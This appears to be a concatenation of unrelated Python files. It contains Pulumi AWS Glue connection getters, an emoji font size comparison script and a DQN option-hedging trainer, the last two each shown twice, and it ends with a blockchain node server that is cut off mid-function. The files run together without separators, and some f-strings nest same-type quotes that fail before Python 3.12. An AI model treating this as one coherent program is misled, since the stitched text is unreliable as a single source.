@pulumi.getter(name="connectionType") def connection_type(self) -> pulumi.Output[Optional[str]]: """ The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. """ return pulumi.get(self, "connection_type") @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ Description of the connection. """ return pulumi.get(self, "description") @property @pulumi.getter(name="matchCriterias") def match_criterias(self) -> pulumi.Output[Optional[Sequence[str]]]: """ A list of criteria that can be used in selecting this connection. """ return pulumi.get(self, "match_criterias") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the connection. """ return pulumi.get(self, "name") @property @pulumi.getter(name="physicalConnectionRequirements") def physical_connection_requirements(self) -> pulumi.Output[Optional['outputs.ConnectionPhysicalConnectionRequirements']]: """ A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. """ return pulumi.get(self, "physical_connection_requirements") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. """ return pulumi.get(self, "tags") @property @pulumi.getter(name="tagsAll") def tags_all(self) -> pulumi.Output[Mapping[str, str]]: """ A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ return pulumi.get(self, "tags_all")
#!/usr/bin/env python3 from pathlib import Path import csv import fontTools.ttLib.woff2 import functools import io import itertools import logging import math import multiprocessing import sys import argparse FONT_BASE_NAMES = { "noto": "Noto Color Emoji", "noto_noflags": "Noto Color Emoji except flags", "noto_flags": "Noto Color Emoji only flags", #"noto_handwriting": "Noto Color single Handwriting emoji", "twemoji": "Twemoji", #"twemoji_smiley": "Twemoji single Smiley Emoji", #"samples": "Samples test font", } FORMAT_DICT = { "cff2_colr_1": "colr_1, cff2", "cff_colr_1": "colr_1, cff", "glyf_colr_1": "colr_1, glyf", "picosvg": "ot-svg, picosvg", "picosvgz": "ot-svg, picosvg, zipped", "untouchedsvg": "ot-svg, svg", "untouchedsvgz": "ot-svg, svg, zipped", } def file_sizes_for_file(file_name): p = Path(file_name) if not p.is_file(): return None compressed_file = io.BytesIO() fontTools.ttLib.woff2.compress(file_name, compressed_file) return { "sfnt_uncompressed": p.stat().st_size, "woff2": len(compressed_file.getvalue()), } def compare_sizes(name_format, noto_cbdt_path=None): (name, format) = name_format if format == "cbdt": # Use parent cbdt file pathname. assert noto_cbdt_path is not None return (name, format, file_sizes_for_file(noto_cbdt_path)) file_name = f"fonts/{name}-{format}.{"o" if "cff" in format else "t"}tf" return (name, format, file_sizes_for_file(file_name)) if __name__ == "__main__": logging.basicConfig(stream=sys.stderr, level=logging.INFO) parser = argparse.ArgumentParser() parser.add_argument( "--noto-cbdt", help="Provide a path for Noto Color Emoji as bitmap font." ) parsed_args = parser.parse_args() noto_cbdt_path = None if parsed_args.noto_cbdt and Path(parsed_args.noto_cbdt).is_file(): noto_cbdt_path = parsed_args.noto_cbdt files = list(itertools.product(FONT_BASE_NAMES, FORMAT_DICT)) if noto_cbdt_path: files.insert(0, ("noto", "cbdt")) FORMAT_DICT["cbdt"] = "CBDT/CBLC bitmap" else: logging.getLogger().warning( "Not adding Noto Color Emoji bitmap info to result." ) partial_compare_sizes = functools.partial( compare_sizes, noto_cbdt_path=noto_cbdt_path ) with multiprocessing.Pool(math.floor(multiprocessing.cpu_count() * 0.75)) as p: size_results = p.map(partial_compare_sizes, files) csv_file = io.StringIO() field_names = ["font", "format", "uncompressed_sfnt_size", "woff2_size"] writer = csv.DictWriter(csv_file, field_names) writer.writeheader() for size_result in size_results: row_dict = { "font": FONT_BASE_NAMES[size_result[0]], "format": FORMAT_DICT[size_result[1]], "uncompressed_sfnt_size": size_result[2]["sfnt_uncompressed"], "woff2_size": size_result[2]["woff2"], } writer.writerow(row_dict) print(csv_file.getvalue())
#!/usr/bin/env python3 from pathlib import Path import csv import fontTools.ttLib.woff2 import functools import io import itertools import logging import math import multiprocessing import sys import argparse FONT_BASE_NAMES = { "noto": "Noto Color Emoji", "noto_noflags": "Noto Color Emoji except flags", "noto_flags": "Noto Color Emoji only flags", #"noto_handwriting": "Noto Color single Handwriting emoji", "twemoji": "Twemoji", #"twemoji_smiley": "Twemoji single Smiley Emoji", #"samples": "Samples test font", } FORMAT_DICT = { "cff2_colr_1": "colr_1, cff2", "cff_colr_1": "colr_1, cff", "glyf_colr_1": "colr_1, glyf", "picosvg": "ot-svg, picosvg", "picosvgz": "ot-svg, picosvg, zipped", "untouchedsvg": "ot-svg, svg", "untouchedsvgz": "ot-svg, svg, zipped", } def file_sizes_for_file(file_name): p = Path(file_name) if not p.is_file(): return None compressed_file = io.BytesIO() fontTools.ttLib.woff2.compress(file_name, compressed_file) return { "sfnt_uncompressed": p.stat().st_size, "woff2": len(compressed_file.getvalue()), } def compare_sizes(name_format, noto_cbdt_path=None): (name, format) = name_format if format == "cbdt": # Use parent cbdt file pathname. assert noto_cbdt_path is not None return (name, format, file_sizes_for_file(noto_cbdt_path)) file_name = f"fonts/{name}-{format}.{'o' if 'cff' in format else 't'}tf" return (name, format, file_sizes_for_file(file_name)) if __name__ == "__main__": logging.basicConfig(stream=sys.stderr, level=logging.INFO) parser = argparse.ArgumentParser() parser.add_argument( "--noto-cbdt", help="Provide a path for Noto Color Emoji as bitmap font." ) parsed_args = parser.parse_args() noto_cbdt_path = None if parsed_args.noto_cbdt and Path(parsed_args.noto_cbdt).is_file(): noto_cbdt_path = parsed_args.noto_cbdt files = list(itertools.product(FONT_BASE_NAMES, FORMAT_DICT)) if noto_cbdt_path: files.insert(0, ("noto", "cbdt")) FORMAT_DICT["cbdt"] = "CBDT/CBLC bitmap" else: logging.getLogger().warning( "Not adding Noto Color Emoji bitmap info to result." ) partial_compare_sizes = functools.partial( compare_sizes, noto_cbdt_path=noto_cbdt_path ) with multiprocessing.Pool(math.floor(multiprocessing.cpu_count() * 0.75)) as p: size_results = p.map(partial_compare_sizes, files) csv_file = io.StringIO() field_names = ["font", "format", "uncompressed_sfnt_size", "woff2_size"] writer = csv.DictWriter(csv_file, field_names) writer.writeheader() for size_result in size_results: row_dict = { "font": FONT_BASE_NAMES[size_result[0]], "format": FORMAT_DICT[size_result[1]], "uncompressed_sfnt_size": size_result[2]["sfnt_uncompressed"], "woff2_size": size_result[2]["woff2"], } writer.writerow(row_dict) print(csv_file.getvalue())
import numpy as np import matplotlib.pyplot as plt import torch import torch.nn as nn import torch.optim as optim from torch.utils.tensorboard import SummaryWriter import gym import random from collections import deque, namedtuple import logging from tqdm import tqdm import argparse import os import time import yaml import csv from copy import deepcopy from optionpricing import * # Defining transition namedtuple here rather than within the class to ensure pickle functionality transition = namedtuple('transition', ['old_state', 'action', 'reward', 'new_state', 'done']) class Estimator(nn.Module): def __init__(self, nhidden, nunits, state_space_dim, action_space_dim): """ Estimator class that returns Q-values ngpu: number of gpus state_space_dim: Dimension of the state space action_space_dim: Dimension of the action space """ super(Estimator, self).__init__() self.state_space_dim = state_space_dim self.action_space_dim = action_space_dim assert nhidden > 0, 'Number of hidden layers must be > 0' init_layer = nn.Linear(state_space_dim, nunits) self.final_layer = nn.Linear(nunits, action_space_dim) layers = [init_layer] for n in range(nhidden - 1): layers.append(nn.Linear(nunits, nunits)) self.module_list = nn.ModuleList(layers) self.relu = nn.ReLU() def forward(self, x): for module in self.module_list: x = module(x) x = self.relu(x) x = self.final_layer(x) return x class Agent: def __init__(self, env, args): """ Agent class to train the DQN env: Gym like environment object args: Training arguments | use --help flag to view """ self.env = env self.args = args self.epsilon = args.epsilon self.decay = args.decay self.gamma = args.gamma self.batch_size = args.batch_size self.replay_memory_size = args.replay_memory_size self.update_every = args.update_every self.epsilon_min = args.epsilon_min self.savedir = args.savedir self.scale = args.scale if args.clip == 0: self.clip = np.inf else: self.clip = args.clip self.best_reward_criteria = args.best_reward_criteria # If mean reward over last 'best_reward_critera' > best_reward, save model # Get valid actions try: self.valid_actions = list(range(env.action_space.n)) except AttributeError as e: print(f'Action space is not Discrete, {e}') # Logging self.train_logger = logging.getLogger('train') self.train_logger.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s, %(message)s', datefmt = '%Y-%m-%d %H:%M:%S') file_handler = logging.FileHandler(os.path.join('experiments', args.savedir, 'training.log')) file_handler.setFormatter(formatter) self.train_logger.addHandler(file_handler) self.train_logger.propagate = False # Tensorboard self.writer = SummaryWriter(log_dir = os.path.join('experiments', self.savedir), flush_secs = 5) # Initialize model self.device = torch.device("cuda:0" if args.cuda else "cpu") state_shape = env.observation_space.shape state_space_dim = state_shape[0] if len(state_shape) == 1 else state_shape self.estimator = Estimator(args.nhidden, args.nunits, state_space_dim, env.action_space.n).to(self.device) self.target = Estimator(args.nhidden, args.nunits, state_space_dim, env.action_space.n).to(self.device) # Optimization self.criterion = nn.SmoothL1Loss(reduction = 'mean') self.optimizer = optim.Adam(self.estimator.parameters(), lr = args.lr, betas = (args.beta1, 0.999)) # If resume, load from checkpoint | otherwise initialize if args.resume: try: self.load_checkpoint(os.path.join('experiments', args.savedir, 'checkpoint.pt')) self.train_logger.info(f'INFO: Resuming from checkpoint; episode: {self.episode}') except FileNotFoundError: print('Checkpoint not found') else: self.replay_memory = deque(maxlen = args.replay_memory_size) # Initialize replay memory self.initialize_replay_memory(self.batch_size) # Set target = estimator self.target.load_state_dict(self.estimator.state_dict()) # Training details self.episode = 0 self.steps = 0 self.best_reward = -self.clip * self.env.T * self.env.D def initialize_replay_memory(self, size): """ Populate replay memory with initial experience size: Number of experiences to initialize (must be >= batch_size) """ if self.replay_memory: self.train_logger.info('INFO: Replay memory already initialized') return assert size >= self.batch_size, "Initialize with size >= batch size" old_state = self.env.reset() for i in range(size): action = random.choice(self.valid_actions) new_state, reward, done, _ = self.env.step(action) reward = np.clip(self.scale * reward, -self.clip, self.clip) self.replay_memory.append(transition(old_state, action, reward, new_state, done)) if done: old_state = self.env.reset() else: old_state = new_state self.train_logger.info(f'INFO: Replay memory initialized with {size} experiences') def train(self, nepisodes, episode_length): """ Train the agent """ train_rewards = [] for episode in tqdm(range(nepisodes)): self.estimator.train() self.episode += 1 episode_rewards = [] episode_steps = 0 episode_history = [] losses = [] done = False kind = None # Type of action taken old_state = self.env.reset() while not done: delta = self.env.delta stock_price = self.env.S call = self.env.call #################################################### # Select e-greedy action # #################################################### if random.random() <= self.epsilon: action = random.choice(self.valid_actions) kind = 'random' else: with torch.no_grad(): old_state = torch.from_numpy(old_state.reshape(1, -1)).to(self.device) action = np.argmax(self.estimator(old_state).cpu().numpy()) old_state = old_state.cpu().numpy().reshape(-1) kind = 'policy' #################################################### # Env step and store experience in replay memory # #################################################### new_state, reward, done, info = self.env.step(action) reward = np.clip(self.scale * reward, -self.clip, self.clip) self.replay_memory.append(transition(old_state, action, reward, new_state, done)) episode_history.append(transition(old_state, action, reward, new_state, done)) episode_rewards.append(reward) episode_steps += 1 self.steps += 1 #################################################### # Sample batch and fit to model # #################################################### batch = random.sample(self.replay_memory, self.batch_size) old_states, actions, rewards, new_states, is_done = map(np.array, zip(*batch)) rewards = rewards.astype(np.float32) old_states = torch.from_numpy(old_states).to(self.device) new_states = torch.from_numpy(new_states).to(self.device) rewards = torch.from_numpy(rewards).to(self.device) is_not_done = torch.from_numpy(np.logical_not(is_done)).to(self.device) actions = torch.from_numpy(actions).long().to(self.device) with torch.no_grad(): q_target = self.target(new_states) max_q, _ = torch.max(q_target, dim = 1) q_target = rewards + self.gamma * is_not_done.float() * max_q # Gather those Q values for which action was taken | since the output is Q values for all possible actions q_values_expected = self.estimator(old_states).gather(1, actions.view(-1, 1)).view(-1) loss = self.criterion(q_values_expected, q_target) self.estimator.zero_grad() loss.backward() self.optimizer.step() losses.append(loss.item()) if not self.steps % self.update_every: self.target.load_state_dict(self.estimator.state_dict()) old_state = new_state # Tensorboard self.writer.add_scalar('Transition/reward', reward, self.steps) self.writer.add_scalar('Transition/loss', loss, self.steps) # Log statistics self.train_logger.info(f'LOG: episode:{self.episode}, step:{episode_steps}, action:{action}, kind:{kind}, reward:{reward}, best_mean_reward:{self.best_reward}, loss:{losses[-1]}, epsilon:{self.epsilon}, S:{stock_price}, c:{call}, delta:{delta}, n:{self.env.n}, dn:{info['dn']}, cost:{info['cost']}, pnl:{info['pnl']}, K:{self.env.K}, T:{self.env.T}') if episode_steps >= episode_length: break # Epsilon decay self.epsilon *= self.decay self.epsilon = max(self.epsilon, self.epsilon_min) train_rewards.append(sum(episode_rewards)) mean_reward = np.mean(train_rewards[-self.best_reward_criteria:]) self.writer.add_scalar('Episode/epsilon', self.epsilon, self.episode) self.writer.add_scalar('Episode/total_reward', sum(episode_rewards), self.episode) self.writer.add_scalar('Episode/mean_loss', np.mean(losses), self.episode) self.writer.add_histogram('Episode/reward', np.array(episode_rewards), self.episode) if mean_reward > self.best_reward: self.best_reward = mean_reward self.save_checkpoint(os.path.join('experiments', self.savedir, 'best.pt')) if not self.episode % self.args.checkpoint_every: self.save_checkpoint(os.path.join('experiments', self.args.savedir, 'checkpoint.pt')) def save_checkpoint(self, path): """ Checkpoint the model path: Save path """ checkpoint = { 'episode': self.episode, 'steps': self.steps, 'epsilon': self.epsilon, 'estimator': self.estimator.state_dict(), 'target': self.target.state_dict(), 'optimizer': self.optimizer.state_dict(), 'replay_memory': self.replay_memory, 'random_state': random.getstate(), 'numpy_random_state': np.random.get_state(), 'torch_random_state': torch.get_rng_state(), 'best_reward': self.best_reward } torch.save(checkpoint, path) def load_checkpoint(self, path): """ Load checkpoint path: Checkpoint (checkpoint.pt) path """ checkpoint = torch.load(path) self.episode = checkpoint['episode'] self.steps = checkpoint['steps'] self.epsilon = checkpoint['epsilon'] self.estimator.load_state_dict(checkpoint['estimator']) self.target.load_state_dict(checkpoint['target']) self.optimizer.load_state_dict(checkpoint['optimizer']) self.replay_memory = checkpoint['replay_memory'] random.setstate(checkpoint['random_state']) np.random.set_state(checkpoint['numpy_random_state']) torch.set_rng_state(checkpoint['torch_random_state']) self.best_reward = checkpoint['best_reward'] if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--nepisodes', type = int, default = 15000, help = 'number of episodes to train') parser.add_argument('--episode_length', type = int, default = 1000, help = 'maximum episode length') parser.add_argument('--epsilon', type = float, default = 1, help = 'starting e-greedy probability') parser.add_argument('--decay', type = float, default = 0.999, help = 'decay of epsilon per episode') parser.add_argument('--epsilon_min', type = float, default = 0.005, help = 'minumum value taken by epsilon') parser.add_argument('--gamma', type = float, default = 0.3, help = 'discount factor') parser.add_argument('--update_every', type = int, default = 500, help = 'update target model every [_] steps') parser.add_argument('--checkpoint_every', type = int, default = 1000, help = 'checkpoint model every [_] steps') parser.add_argument('--resume', action = 'store_true', help = 'resume from previous checkpoint from save directory') parser.add_argument('--batch_size', type = int, default = 128, help = 'batch size') parser.add_argument('--replay_memory_size', type = int, default = 64000, help = 'replay memory size') parser.add_argument('--seed', type = int, help = 'random seed') parser.add_argument('--savedir', type = str, help = 'save directory') parser.add_argument('--nhidden', type = int, default = 2, help = 'number of hidden layers') parser.add_argument('--nunits', type = int, default = 128, help = 'number of units in a hidden layer') parser.add_argument('--lr', type = float, default = 0.001, help = 'learning rate') parser.add_argument('--beta1', type = float, default = 0.9, help = 'beta1') parser.add_argument('--cuda', action = 'store_true', help = 'cuda') parser.add_argument('--scale', type = float, default = 1, help = 'scale reward by [_] | reward = [_] * reward | Takes priority over clip') parser.add_argument('--clip', type = float, default = 100, help = 'clip reward between [-clip, clip] | Pass in 0 for no clipping') parser.add_argument('--best_reward_criteria', type = int, default = 10, help = 'save model if mean reward over last [_] episodes greater than best reward') parser.add_argument('--trc_multiplier', type = float, default = 1, help = 'transaction cost multiplier') parser.add_argument('--trc_ticksize', type = float, default = 0.1, help = 'transaction cost ticksize') args = parser.parse_args() if args.seed is None: args.seed = random.randint(1, 10000) if args.savedir is None: args.savedir = time.strftime('%Y-%m-%d_%H:%M:%S', time.localtime()) try: os.makedirs(os.path.join('experiments', args.savedir)) except OSError: pass if not args.resume: with open(os.path.join('experiments', args.savedir, 'config.yaml'), 'w') as f: yaml.dump(vars(args), f) random.seed(args.seed) torch.manual_seed(args.seed) np.random.seed(args.seed) config = { 'S': 100, 'T': 10, # 10 days 'L': 1, 'm': 100, # L options for m stocks 'n': 0, 'K': [95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105], 'D': 5, 'mu': 0, 'sigma': 0.01, 'r': 0, 'ss': 5, 'kappa': 0.1, 'multiplier': args.trc_multiplier, 'ticksize': args.trc_ticksize } env = OptionPricingEnv(config) env.configure() agent = Agent(env, args) agent.train(args.nepisodes, args.episode_length)
import numpy as np import matplotlib.pyplot as plt import torch import torch.nn as nn import torch.optim as optim from torch.utils.tensorboard import SummaryWriter import gym import random from collections import deque, namedtuple import logging from tqdm import tqdm import argparse import os import time import yaml import csv from copy import deepcopy from optionpricing import * # Defining transition namedtuple here rather than within the class to ensure pickle functionality transition = namedtuple('transition', ['old_state', 'action', 'reward', 'new_state', 'done']) class Estimator(nn.Module): def __init__(self, nhidden, nunits, state_space_dim, action_space_dim): """ Estimator class that returns Q-values ngpu: number of gpus state_space_dim: Dimension of the state space action_space_dim: Dimension of the action space """ super(Estimator, self).__init__() self.state_space_dim = state_space_dim self.action_space_dim = action_space_dim assert nhidden > 0, 'Number of hidden layers must be > 0' init_layer = nn.Linear(state_space_dim, nunits) self.final_layer = nn.Linear(nunits, action_space_dim) layers = [init_layer] for n in range(nhidden - 1): layers.append(nn.Linear(nunits, nunits)) self.module_list = nn.ModuleList(layers) self.relu = nn.ReLU() def forward(self, x): for module in self.module_list: x = module(x) x = self.relu(x) x = self.final_layer(x) return x class Agent: def __init__(self, env, args): """ Agent class to train the DQN env: Gym like environment object args: Training arguments | use --help flag to view """ self.env = env self.args = args self.epsilon = args.epsilon self.decay = args.decay self.gamma = args.gamma self.batch_size = args.batch_size self.replay_memory_size = args.replay_memory_size self.update_every = args.update_every self.epsilon_min = args.epsilon_min self.savedir = args.savedir self.scale = args.scale if args.clip == 0: self.clip = np.inf else: self.clip = args.clip self.best_reward_criteria = args.best_reward_criteria # If mean reward over last 'best_reward_critera' > best_reward, save model # Get valid actions try: self.valid_actions = list(range(env.action_space.n)) except AttributeError as e: print(f'Action space is not Discrete, {e}') # Logging self.train_logger = logging.getLogger('train') self.train_logger.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s, %(message)s', datefmt = '%Y-%m-%d %H:%M:%S') file_handler = logging.FileHandler(os.path.join('experiments', args.savedir, 'training.log')) file_handler.setFormatter(formatter) self.train_logger.addHandler(file_handler) self.train_logger.propagate = False # Tensorboard self.writer = SummaryWriter(log_dir = os.path.join('experiments', self.savedir), flush_secs = 5) # Initialize model self.device = torch.device("cuda:0" if args.cuda else "cpu") state_shape = env.observation_space.shape state_space_dim = state_shape[0] if len(state_shape) == 1 else state_shape self.estimator = Estimator(args.nhidden, args.nunits, state_space_dim, env.action_space.n).to(self.device) self.target = Estimator(args.nhidden, args.nunits, state_space_dim, env.action_space.n).to(self.device) # Optimization self.criterion = nn.SmoothL1Loss(reduction = 'mean') self.optimizer = optim.Adam(self.estimator.parameters(), lr = args.lr, betas = (args.beta1, 0.999)) # If resume, load from checkpoint | otherwise initialize if args.resume: try: self.load_checkpoint(os.path.join('experiments', args.savedir, 'checkpoint.pt')) self.train_logger.info(f'INFO: Resuming from checkpoint; episode: {self.episode}') except FileNotFoundError: print('Checkpoint not found') else: self.replay_memory = deque(maxlen = args.replay_memory_size) # Initialize replay memory self.initialize_replay_memory(self.batch_size) # Set target = estimator self.target.load_state_dict(self.estimator.state_dict()) # Training details self.episode = 0 self.steps = 0 self.best_reward = -self.clip * self.env.T * self.env.D def initialize_replay_memory(self, size): """ Populate replay memory with initial experience size: Number of experiences to initialize (must be >= batch_size) """ if self.replay_memory: self.train_logger.info('INFO: Replay memory already initialized') return assert size >= self.batch_size, "Initialize with size >= batch size" old_state = self.env.reset() for i in range(size): action = random.choice(self.valid_actions) new_state, reward, done, _ = self.env.step(action) reward = np.clip(self.scale * reward, -self.clip, self.clip) self.replay_memory.append(transition(old_state, action, reward, new_state, done)) if done: old_state = self.env.reset() else: old_state = new_state self.train_logger.info(f'INFO: Replay memory initialized with {size} experiences') def train(self, nepisodes, episode_length): """ Train the agent """ train_rewards = [] for episode in tqdm(range(nepisodes)): self.estimator.train() self.episode += 1 episode_rewards = [] episode_steps = 0 episode_history = [] losses = [] done = False kind = None # Type of action taken old_state = self.env.reset() while not done: delta = self.env.delta stock_price = self.env.S call = self.env.call #################################################### # Select e-greedy action # #################################################### if random.random() <= self.epsilon: action = random.choice(self.valid_actions) kind = 'random' else: with torch.no_grad(): old_state = torch.from_numpy(old_state.reshape(1, -1)).to(self.device) action = np.argmax(self.estimator(old_state).cpu().numpy()) old_state = old_state.cpu().numpy().reshape(-1) kind = 'policy' #################################################### # Env step and store experience in replay memory # #################################################### new_state, reward, done, info = self.env.step(action) reward = np.clip(self.scale * reward, -self.clip, self.clip) self.replay_memory.append(transition(old_state, action, reward, new_state, done)) episode_history.append(transition(old_state, action, reward, new_state, done)) episode_rewards.append(reward) episode_steps += 1 self.steps += 1 #################################################### # Sample batch and fit to model # #################################################### batch = random.sample(self.replay_memory, self.batch_size) old_states, actions, rewards, new_states, is_done = map(np.array, zip(*batch)) rewards = rewards.astype(np.float32) old_states = torch.from_numpy(old_states).to(self.device) new_states = torch.from_numpy(new_states).to(self.device) rewards = torch.from_numpy(rewards).to(self.device) is_not_done = torch.from_numpy(np.logical_not(is_done)).to(self.device) actions = torch.from_numpy(actions).long().to(self.device) with torch.no_grad(): q_target = self.target(new_states) max_q, _ = torch.max(q_target, dim = 1) q_target = rewards + self.gamma * is_not_done.float() * max_q # Gather those Q values for which action was taken | since the output is Q values for all possible actions q_values_expected = self.estimator(old_states).gather(1, actions.view(-1, 1)).view(-1) loss = self.criterion(q_values_expected, q_target) self.estimator.zero_grad() loss.backward() self.optimizer.step() losses.append(loss.item()) if not self.steps % self.update_every: self.target.load_state_dict(self.estimator.state_dict()) old_state = new_state # Tensorboard self.writer.add_scalar('Transition/reward', reward, self.steps) self.writer.add_scalar('Transition/loss', loss, self.steps) # Log statistics self.train_logger.info(f'LOG: episode:{self.episode}, step:{episode_steps}, action:{action}, kind:{kind}, reward:{reward}, best_mean_reward:{self.best_reward}, loss:{losses[-1]}, epsilon:{self.epsilon}, S:{stock_price}, c:{call}, delta:{delta}, n:{self.env.n}, dn:{info["dn"]}, cost:{info["cost"]}, pnl:{info["pnl"]}, K:{self.env.K}, T:{self.env.T}') if episode_steps >= episode_length: break # Epsilon decay self.epsilon *= self.decay self.epsilon = max(self.epsilon, self.epsilon_min) train_rewards.append(sum(episode_rewards)) mean_reward = np.mean(train_rewards[-self.best_reward_criteria:]) self.writer.add_scalar('Episode/epsilon', self.epsilon, self.episode) self.writer.add_scalar('Episode/total_reward', sum(episode_rewards), self.episode) self.writer.add_scalar('Episode/mean_loss', np.mean(losses), self.episode) self.writer.add_histogram('Episode/reward', np.array(episode_rewards), self.episode) if mean_reward > self.best_reward: self.best_reward = mean_reward self.save_checkpoint(os.path.join('experiments', self.savedir, 'best.pt')) if not self.episode % self.args.checkpoint_every: self.save_checkpoint(os.path.join('experiments', self.args.savedir, 'checkpoint.pt')) def save_checkpoint(self, path): """ Checkpoint the model path: Save path """ checkpoint = { 'episode': self.episode, 'steps': self.steps, 'epsilon': self.epsilon, 'estimator': self.estimator.state_dict(), 'target': self.target.state_dict(), 'optimizer': self.optimizer.state_dict(), 'replay_memory': self.replay_memory, 'random_state': random.getstate(), 'numpy_random_state': np.random.get_state(), 'torch_random_state': torch.get_rng_state(), 'best_reward': self.best_reward } torch.save(checkpoint, path) def load_checkpoint(self, path): """ Load checkpoint path: Checkpoint (checkpoint.pt) path """ checkpoint = torch.load(path) self.episode = checkpoint['episode'] self.steps = checkpoint['steps'] self.epsilon = checkpoint['epsilon'] self.estimator.load_state_dict(checkpoint['estimator']) self.target.load_state_dict(checkpoint['target']) self.optimizer.load_state_dict(checkpoint['optimizer']) self.replay_memory = checkpoint['replay_memory'] random.setstate(checkpoint['random_state']) np.random.set_state(checkpoint['numpy_random_state']) torch.set_rng_state(checkpoint['torch_random_state']) self.best_reward = checkpoint['best_reward'] if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--nepisodes', type = int, default = 15000, help = 'number of episodes to train') parser.add_argument('--episode_length', type = int, default = 1000, help = 'maximum episode length') parser.add_argument('--epsilon', type = float, default = 1, help = 'starting e-greedy probability') parser.add_argument('--decay', type = float, default = 0.999, help = 'decay of epsilon per episode') parser.add_argument('--epsilon_min', type = float, default = 0.005, help = 'minumum value taken by epsilon') parser.add_argument('--gamma', type = float, default = 0.3, help = 'discount factor') parser.add_argument('--update_every', type = int, default = 500, help = 'update target model every [_] steps') parser.add_argument('--checkpoint_every', type = int, default = 1000, help = 'checkpoint model every [_] steps') parser.add_argument('--resume', action = 'store_true', help = 'resume from previous checkpoint from save directory') parser.add_argument('--batch_size', type = int, default = 128, help = 'batch size') parser.add_argument('--replay_memory_size', type = int, default = 64000, help = 'replay memory size') parser.add_argument('--seed', type = int, help = 'random seed') parser.add_argument('--savedir', type = str, help = 'save directory') parser.add_argument('--nhidden', type = int, default = 2, help = 'number of hidden layers') parser.add_argument('--nunits', type = int, default = 128, help = 'number of units in a hidden layer') parser.add_argument('--lr', type = float, default = 0.001, help = 'learning rate') parser.add_argument('--beta1', type = float, default = 0.9, help = 'beta1') parser.add_argument('--cuda', action = 'store_true', help = 'cuda') parser.add_argument('--scale', type = float, default = 1, help = 'scale reward by [_] | reward = [_] * reward | Takes priority over clip') parser.add_argument('--clip', type = float, default = 100, help = 'clip reward between [-clip, clip] | Pass in 0 for no clipping') parser.add_argument('--best_reward_criteria', type = int, default = 10, help = 'save model if mean reward over last [_] episodes greater than best reward') parser.add_argument('--trc_multiplier', type = float, default = 1, help = 'transaction cost multiplier') parser.add_argument('--trc_ticksize', type = float, default = 0.1, help = 'transaction cost ticksize') args = parser.parse_args() if args.seed is None: args.seed = random.randint(1, 10000) if args.savedir is None: args.savedir = time.strftime('%Y-%m-%d_%H:%M:%S', time.localtime()) try: os.makedirs(os.path.join('experiments', args.savedir)) except OSError: pass if not args.resume: with open(os.path.join('experiments', args.savedir, 'config.yaml'), 'w') as f: yaml.dump(vars(args), f) random.seed(args.seed) torch.manual_seed(args.seed) np.random.seed(args.seed) config = { 'S': 100, 'T': 10, # 10 days 'L': 1, 'm': 100, # L options for m stocks 'n': 0, 'K': [95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105], 'D': 5, 'mu': 0, 'sigma': 0.01, 'r': 0, 'ss': 5, 'kappa': 0.1, 'multiplier': args.trc_multiplier, 'ticksize': args.trc_ticksize } env = OptionPricingEnv(config) env.configure() agent = Agent(env, args) agent.train(args.nepisodes, args.episode_length)
import json import time from functools import lru_cache from multiprocessing import Pool, Process from threading import Thread, Timer from typing import Any, Dict, List from datetime import datetime import hashlib import inspect import requests import waitress from bottle import BaseTemplate, Bottle, request, response, static_file, template, error import utils.constants as consts from core import Block, BlockChain, SingleOutput, Transaction, TxIn, TxOut, genesis_block from authority import Authority from utils.logger import logger, iplogger from utils.storage import get_block_from_db, get_wallet_from_db, read_header_list_from_db from utils.utils import compress, decompress, dhash from wallet import Wallet app = Bottle() BaseTemplate.defaults["get_url"] = app.get_url LINE_PROFILING = False BLOCKCHAIN = BlockChain() PEER_LIST: List[Dict[str, Any]] = [] MY_WALLET = Wallet() miner = Authority() def mining_thread_task(): while True: if not miner.is_mining() and not consts.NO_MINING: try: miner.start_mining(BLOCKCHAIN.mempool, BLOCKCHAIN.active_chain, MY_WALLET) except Exception as e: miner.stop_mining() logger.debug("Miner: Error while mining:" + str(e)) time.sleep(consts.MINING_INTERVAL_THRESHOLD // 2) def send_to_all_peers(url, data): def request_task(peers, url, data): for peer in peers: try: requests.post(get_peer_url(peer) + url, data=data, timeout=(5, 1)) except Exception as e: logger.debug("Server: Requests: Error while sending data in process" + str(peer)) Process(target=request_task, args=(PEER_LIST, url, data), daemon=True).start() def start_mining_thread(): time.sleep(5) Thread(target=mining_thread_task, name="Miner", daemon=True).start() def fetch_peer_list() -> List[Dict[str, Any]]: try: r = requests.post(consts.SEED_SERVER_URL, data={"port": consts.MINER_SERVER_PORT}) peer_list = json.loads(r.text) return peer_list except Exception as e: logger.error("Could not connect to DNS Seed") return [] def get_peer_url(peer: Dict[str, Any]) -> str: return "http://" + str(peer["ip"]) + ":" + str(peer["port"]) def greet_peer(peer: Dict[str, Any]) -> bool: try: url = get_peer_url(peer) data = {"port": consts.MINER_SERVER_PORT, "version": consts.MINER_VERSION, "blockheight": BLOCKCHAIN.active_chain.length} # Send a POST request to the peer r = requests.post(url + "/greetpeer", data=data) data = json.loads(r.text) # Update the peer data in the peer list with the new data received from the peer. if data.get("blockheight", None): peer.update(data) else: logger.debug("Main: Peer data does not have Block Height") return False return True except Exception as e: logger.debug("Main: Could not greet peer" + str(e)) return False def receive_block_from_peer(peer: Dict[str, Any], header_hash) -> Block: r = requests.post(get_peer_url(peer) + "/getblock", data={"headerhash": header_hash}) return Block.from_json(decompress(r.text)).object() def check_block_with_peer(peer, hhash): r = requests.post(get_peer_url(peer) + "/checkblock", data={"headerhash": hhash}) result = json.loads(r.text) if result: return True return False def get_block_header_hash(height): return dhash(BLOCKCHAIN.active_chain.header_list[height]) def sync(max_peer): fork_height = BLOCKCHAIN.active_chain.length r = 